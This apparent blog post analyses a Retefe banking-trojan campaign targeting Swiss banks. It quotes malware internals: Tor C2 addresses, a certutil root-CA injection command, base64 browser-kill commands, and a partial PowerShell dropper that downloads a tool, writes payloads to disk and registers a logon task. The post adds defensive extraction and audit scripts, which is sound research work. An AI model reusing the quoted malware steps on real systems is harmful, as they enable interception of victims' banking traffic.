A few days ago, when I took a look at the latest Retefe campaign affecting Swiss financial institutions, I did not have the time to take a deeper look at the malicious JS embedded in the .docx file, so in this post I'll explain a bit about it. In particular, I'm interested in understanding how the Proxifier tool is set up with a custom profile to forward the traffic through Tor. This tool is something the cyber criminals have introduced recently; previously they used a proxy PAC file, which is set up through the registry value "HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\AutoConfigURL".

The latest analysis of Retefe from Avast shows exactly the behaviour described above.

Retefe is not only affecting Swiss banks but also banks in other countries, like the UK. So it might be that the custom proxy file is hardcoded into the malicious JS, or that the file is downloaded dynamically. Let's take a look at it.

(I have uploaded the malicious JS payload to VT.)

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting things I see are the Tor URLs defined: bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion.


Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...

Also, there is the fake Comodo CA certificate, which is used to avoid the browser SSL warnings. It is embedded base64 encoded.



There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.



Then there is the command to import the certificate into the current user's trusted root store:

"certutil -addstore -f -user \"ROOT\" \""


and some base64 encoded commands to kill the running browsers:

"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="

taskkill /F /im iexplore.exe

"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"

taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe
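When triaging a sample like this, the first pass is usually to pull every base64-looking string literal out of the script and decode it: commands come out as text, while the embedded CA certificate comes out as a DER blob. The helper below is an added example and not code from the original post; the function name is my own and the sample input is constructed from the three strings quoted above plus one decoy.

```powershell
# Added example (not from the original post): extract base64-looking string
# literals from script text and classify what they decode to.
function Get-DecodableBase64Literal {
    param(
        [Parameter(Mandatory)][string]$Text,
        [int]$MinLength = 16
    )
    # Quoted runs of the base64 alphabet, at least $MinLength long, optional "=" padding
    $pattern = "[`"']([A-Za-z0-9+/]{$MinLength,}={0,2})[`"']"
    foreach ($m in [regex]::Matches($Text, $pattern)) {
        $literal = $m.Groups[1].Value
        if ($literal.Length % 4 -ne 0) { continue }   # not valid base64 framing
        try {
            $bytes = [Convert]::FromBase64String($literal)
        } catch { continue }
        $decoded = [Text.Encoding]::ASCII.GetString($bytes)
        if ($decoded -match '^[\x20-\x7E\r\n\t]+$') {
            $kind = 'text'                              # e.g. a taskkill command
        } elseif ($bytes.Length -gt 2 -and $bytes[0] -eq 0x30 -and $bytes[1] -eq 0x82) {
            $kind = 'der-sequence'                      # how a DER-encoded certificate starts
            $decoded = "<binary, $($bytes.Length) bytes>"
        } else {
            continue                                    # random bytes: skip
        }
        [pscustomobject]@{ Kind = $kind; Encoded = $literal; Decoded = $decoded }
    }
}

# Constructed sample mimicking how the literals sit inside the obfuscated JS
$sample = @'
var k = ["dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ==", "dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl", "dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="];
var junk = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
'@

Get-DecodableBase64Literal -Text $sample | Format-Table -AutoSize
```

Run against the real sample, the three taskkill commands come back as text and the decoy (all zero bytes) is dropped; the fake Comodo CA shows up as a der-sequence entry, which is the cue to write those bytes to a .cer file and inspect them with certutil -dump.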


So at this point the malicious certificate has been imported, and all the browsers, once killed and reopened, have the malicious COMODO CA certificate in their trusted CA chain.
Debugging deeper, in the end a temporary file is created which contains a PowerShell script with the interesting stuff.

This is the code (the dump is cut off in the middle of AddTask; note that the Microsoft.Win32.TaskScheduler classes are not part of .NET, so the script has to ship or load a separate Task Scheduler wrapper DLL):


function Unzip {
    param([string]$zipfile, [string]$destination);
    $7zaExe = Join-Path $env:Temp '7za.exe';
    if (-NOT (Test-Path $7zaExe)){
        Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe); } Catch{}
    }
    if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
        Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
    } else{
        $shell = new-object -com shell.application;
        $zip = $shell.NameSpace($zipfile);
        foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); }
    }
}
function Base64ToFile {
    param([string]$file, [string]$string);
    $bytes=[System.Convert]::FromBase64String($string);
    #set-content -encoding byte $file -value $bytes;
    [IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask {
    param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
    $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
    $td=$ts.NewTask();
    $td.RegistrationInfo.Description = 'Does something';
    $td.Settings.DisallowStartIfOnBatteries = $False;
    $td.Settings.StopIfGoingOnBatteries = $False;
    $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
    $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger
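Everything seen so far leaves traces a defender can look for on the host: the AutoConfigURL value mentioned at the top of the post, a root CA that exists only in the user's store (where "certutil -addstore -user ROOT" puts it), a logon-triggered scheduled task whose command line points into a user-writable directory, and the 7za.exe helper the dropper fetches into %TEMP%. The audit below is an added example and not code from the original post; it is read-only, the function name is my own, and it assumes Windows 8 / Server 2012 or later because it relies on Get-ScheduledTask.

```powershell
# Added example (not from the original post): read-only audit of the current
# user's profile for the trust and persistence changes described in the analysis.
function Find-RetefeStyleArtifacts {
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Proxy auto-config pushed through the registry (the older Retefe technique)
    $inetKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $pac = (Get-ItemProperty -Path $inetKey -ErrorAction SilentlyContinue).AutoConfigURL
    if ($pac) {
        $findings.Add([pscustomobject]@{ Check = 'AutoConfigURL'; Detail = $pac })
    }

    # 2. Root CAs present only in the *user* store. "certutil -addstore -user ROOT"
    #    writes here; a root the machine store does not know is worth a look.
    $machineRoots = @(Get-ChildItem Cert:\LocalMachine\Root | Select-Object -ExpandProperty Thumbprint)
    foreach ($cert in Get-ChildItem Cert:\CurrentUser\Root) {
        if ($machineRoots -notcontains $cert.Thumbprint) {
            $findings.Add([pscustomobject]@{
                Check  = 'UserOnlyRootCA'
                Detail = "$($cert.Subject) [$($cert.Thumbprint)]"
            })
        }
    }

    # 3. Logon-triggered scheduled tasks whose command line points into a
    #    user-writable directory (the dropped script registers a LogonTrigger task).
    $userDirs = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA) | Where-Object { $_ }
    foreach ($task in @(Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $logon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
        if ($logon.Count -eq 0) { continue }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions carry no Execute
            $cmdline = [Environment]::ExpandEnvironmentVariables("$($action.Execute) $($action.Arguments)")
            foreach ($dir in $userDirs) {
                if ($cmdline -like "*$dir*") {
                    $findings.Add([pscustomobject]@{
                        Check  = 'LogonTaskFromUserDir'
                        Detail = "$($task.TaskName): $cmdline"
                    })
                    break
                }
            }
        }
    }

    # 4. The unzip helper the dropper downloads from chocolatey.org lands in %TEMP%\7za.exe
    $sevenZip = Join-Path $env:TEMP '7za.exe'
    if (Test-Path $sevenZip) {
        $findings.Add([pscustomobject]@{ Check = 'TempSevenZip'; Detail = $sevenZip })
    }

    return $findings
}

Find-RetefeStyleArtifacts | Format-Table -AutoSize
```

Treat every line it prints as something to review rather than proof of infection: a user-only root CA or a logon task under %APPDATA% can be legitimate, but on a machine that received one of these .docx files they are the first places to look, and the AutoConfigURL value is what to clear if the older PAC variant is found.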
